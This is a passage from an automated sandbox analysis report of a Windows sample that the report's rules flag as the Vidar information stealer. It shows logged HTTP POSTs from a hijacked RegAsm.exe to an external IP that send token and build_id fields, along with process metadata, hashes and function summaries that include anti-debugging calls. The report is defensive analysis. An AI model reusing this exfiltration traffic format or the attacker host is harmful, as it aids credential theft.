2024-04-24 14:49:44 UTC	15720	OUT	Data Raw: 63 4d 42 6b 63 34 50 42 39 4b 39 52 56 49 50 5a 6e 67 75 6a 55 53 75 34 76 37 68 61 4b 44 6b 53 50 47 79 73 72 6f 64 72 4b 79 6b 46 54 36 45 47 67 5a 4c 4b 71 67 73 7a 4d 46 56 56 47 53 53 65 67 41 37 6d 71 75 72 58 49 63 57 6e 61 32 6f 56 30 33 68 54 78 42 5a 36 47 6c 32 4c 70 4a 6d 38 34 6f 56 38 70 51 65 6d 63 35 79 52 36 31 79 7a 53 4b 6e 6d 37 67 77 38 6b 45 79 6a 61 63 70 67 34 4f 37 30 35 4f 4f 61 58 66 68 74 70 53 51 4e 35 70 68 77 59 32 42 38 77 59 79 6e 54 37 33 49 34 36 38 31 7a 34 69 6e 53 72 77 39 6e 4b 58 34 6e 62 67 36 74 66 43 31 50 61 30 34 33 65 32 71 5a 36 56 2f 77 6e 32 6b 2f 77 44 50 47 38 2f 37 39 72 2f 38 56 53 66 38 4a 39 70 50 2f 50 43 39 2f 77 43 2f 61 2f 38 41 78 56 65 62 4f 34 6a 2f 41 4e 59 72 78 39 63 62 30 4b 35 77 53 44 31 Data Ascii: cMBkc4PB9K9RVIPZngujUSu4v7haKDkSPGysrodrKykFT6EGgZLKqgszMFVVGSSegA7mqurXIcWna2oV03hTxBZ6Gl2LpJm84oV8pQemc5yR61yzSKnm7gw8kEyjacpg4O705OOaXfhtpSQN5phwY2B8wYynT73I4681z4inSrw9nKX4nbg6tfC1Pa043e2qZ6V/wn2k/wDPG8/79r/8VSf8J9pP/PC9/wC/a/8AxVebO4j/ANYrx9cb0K5wSD1
2024-04-24 14:49:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:49:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49765	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:50 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:49:50 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------CFIECBFIDGDAKFHIEHJKCont
2024-04-24 14:49:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:49:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49766	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:52 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:49:52 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------KFBFCAFCBKFIEBFHIDBACont
2024-04-24 14:49:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:49:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:47:57
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x230000
File size:	1'129'584 bytes
MD5 hash:	FCC226702F89FB80675C9B20156500F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:47:58
Start date:	24/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf70000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:47:58
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 340
Imagebase:	0x520000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00249210 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 211
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(000000FF,0032F018,000004AC,00000040,?,?), ref: 002492D9
GlobalFree.KERNELBASE(00000000), ref: 0024931B

Strings

O, xrefs: 00249226
E-<E, xrefs: 00249216
A, xrefs: 0024924F

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: FreeGlobalProtectVirtual
String ID: A$E-<E$O
API String ID: 2969745934-100975978
Opcode ID: acf99961362128ead8c2cd4c6be4b12ee400ddf2eb55beaaf7661d74b53571a9
Instruction ID: 3bcffa9c40d3ec41ec5cc91ecb0737daa7320f4fe90074d69b57dbb7403885b3
Opcode Fuzzy Hash: acf99961362128ead8c2cd4c6be4b12ee400ddf2eb55beaaf7661d74b53571a9
Instruction Fuzzy Hash: 814148B1E14348ABDB05EF64DC46BEEB7B4BF59300F004264FE1476192EB70AAA48B50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002CF70E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultLCID.KERNEL32 ref: 002CF81A
IsValidCodePage.KERNEL32(00000000), ref: 002CF863
IsValidLocale.KERNEL32(?,00000001), ref: 002CF872
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 002CF8BA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 002CF8D9

Strings

., xrefs: 002CF7C7
E-<E, xrefs: 002CF716

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID: E-<E$.
API String ID: 3475089800-1047200399
Opcode ID: 90bfeb891b89f6f83c99efbd1e6ea984fe74a0aa5bc782ca4545660ed5e0e89d
Instruction ID: 28cb9b56ecd3ba5ca04c6a537f8c041270907894977d2da3749c1646ecd72306
Opcode Fuzzy Hash: 90bfeb891b89f6f83c99efbd1e6ea984fe74a0aa5bc782ca4545660ed5e0e89d
Instruction Fuzzy Hash: E7517071A202069BDF50DFA5DD45FBAB7BABF08700F15067DA904EB190EB709D248B61

Uniqueness

Uniqueness Score: -1.00%

Function 002C97DC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 002C98CC
FindNextFileW.KERNEL32(00000000,?), ref: 002C99C0
FindClose.KERNEL32(00000000), ref: 002C99FF
FindClose.KERNEL32(00000000), ref: 002C9A32

Strings

E-<E, xrefs: 002C97E7

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: E-<E
API String ID: 1164774033-3361631808
Opcode ID: 466c58361e3ed6e6939fb13ec6781cf70e62a28d2d1befa01689588814613aa4
Instruction ID: 555d568859aee9ee269859b03818c58e02113fd44a9574e3f1f57ad26bebb540
Opcode Fuzzy Hash: 466c58361e3ed6e6939fb13ec6781cf70e62a28d2d1befa01689588814613aa4
Instruction Fuzzy Hash: BA71EFB1915159AEDF21AF288C8DFAABBB9AF45300F1442DDE048A7251DA318EE58F50

Uniqueness

Uniqueness Score: -1.00%

Function 002C9B02 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 002C9B9D
FindNextFileW.KERNEL32(00000000,?), ref: 002C9C18
FindClose.KERNEL32(00000000), ref: 002C9C3A
FindClose.KERNEL32(00000000), ref: 002C9C5D

Strings

E-<E, xrefs: 002C9B0D

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: E-<E
API String ID: 1164774033-3361631808
Opcode ID: ab81fe0eb4095eb32144edfbb5d1a611cf6ae31c03b8cd4b577d6338173c0166
Instruction ID: 16a10ad90330799db9280957e170a56ee6296aba6bdee8f5c1b1c2b7ecf6a40d
Opcode Fuzzy Hash: ab81fe0eb4095eb32144edfbb5d1a611cf6ae31c03b8cd4b577d6338173c0166
Instruction Fuzzy Hash: DB41C671910519AEDB20DF64DD8CFBAB3BCEB85308F10429AE405D3184E6709ED0CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002CF4C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 002CF55E
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 002CF587
GetACP.KERNEL32 ref: 002CF59C

Strings

ACP, xrefs: 002CF4E3
OCP, xrefs: 002CF519

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: e4f360af223ab68cb6032cd167a183b853f64ea0a345861b4f8324a885b79e41
Instruction ID: 04dae0f652fdcec6da91f5e03e534d9d9d3effab79622c4d855854e8e1ba8928
Opcode Fuzzy Hash: e4f360af223ab68cb6032cd167a183b853f64ea0a345861b4f8324a885b79e41
Instruction Fuzzy Hash: CC21B53267010296D7B48F15DB01FA773ABAB50B90BD68638EB0AD7100F731DD61C350

Uniqueness

Uniqueness Score: -1.00%

Function 002D267F Relevance: 8.7, Strings: 5, Instructions: 2437COMMON

Download Yara Rule

Strings

1#IND, xrefs: 002D2784
1#SNAN, xrefs: 002D278B
E-<E, xrefs: 002D268A
1#INF, xrefs: 002D27B5
1#QNAN, xrefs: 002D2792

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$E-<E
API String ID: 0-2670860390
Opcode ID: f9ccb6943337433492b6d7f259cca6644f691d63d686c62f688dd99639e2e840
Instruction ID: bad398b2f92415e642171056bc1f40a3ecb40558378218c36498979762cd9fce
Opcode Fuzzy Hash: f9ccb6943337433492b6d7f259cca6644f691d63d686c62f688dd99639e2e840
Instruction Fuzzy Hash: 94D248B2E282298FDB25CE28DD407EAB7B5EB54304F1441EBD84DE7240D778AE958F41

Uniqueness

Uniqueness Score: -1.00%

Function 002CF06B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002CF0BF
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002CF109
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002CF1CF

Strings

E-<E, xrefs: 002CF076

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: E-<E
API String ID: 2299586839-3361631808
Opcode ID: 13dd472bdcbd268b3161ce186b9e3a399e7d1a023ca42d7bea022e52192947e3
Instruction ID: dcf475dd934cfee94eadb037f80e3e720544fd104a04d2d7c15351aafbb4bd77
Opcode Fuzzy Hash: 13dd472bdcbd268b3161ce186b9e3a399e7d1a023ca42d7bea022e52192947e3
Instruction Fuzzy Hash: 8361AD755602079FEB689F24CE82FAA73AAEF04300F14427DED09C6685E774DA61CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00284F55 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0028504D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00285057
UnhandledExceptionFilter.KERNEL32(?), ref: 00285064

Strings

E-<E, xrefs: 00284F60

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: E-<E
API String ID: 3906539128-3361631808
Opcode ID: e609af86495b3491a0db14e297ffa2507bbcc14cfe9d0020e8beb13735c63b8b
Instruction ID: 5b3a6281a9b64eff9c27fdf0b05040a5ea4b32746ec26390e199d24aa80e4826
Opcode Fuzzy Hash: e609af86495b3491a0db14e297ffa2507bbcc14cfe9d0020e8beb13735c63b8b
Instruction Fuzzy Hash: F031D4B4D1122D9BCB21EF24DD88B8DBBF8BF08310F5041DAE41CA6290E7749B958F44

Uniqueness

Uniqueness Score: -1.00%

Function 00273DBA Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00273DC6
IsDebuggerPresent.KERNEL32 ref: 00273E92
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00273EAB
UnhandledExceptionFilter.KERNEL32(?), ref: 00273EB5

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 2fb4bfd5f3cbb5d380b4001ef04a027a99a6149651521d188aad5293f17794ba
Instruction ID: 5531a667c18567998a2d9b277f947d0952189ac6292d97babac701443c34cc29
Opcode Fuzzy Hash: 2fb4bfd5f3cbb5d380b4001ef04a027a99a6149651521d188aad5293f17794ba
Instruction Fuzzy Hash: BE3118B5D152199BDB21EF65D9897CDBBF8AF08300F1041AAE40CAB290EB719B84DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0024CB3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 0024CB53
FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 0024CB7A

Strings

!x-sys-default-locale, xrefs: 0024CB4E

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

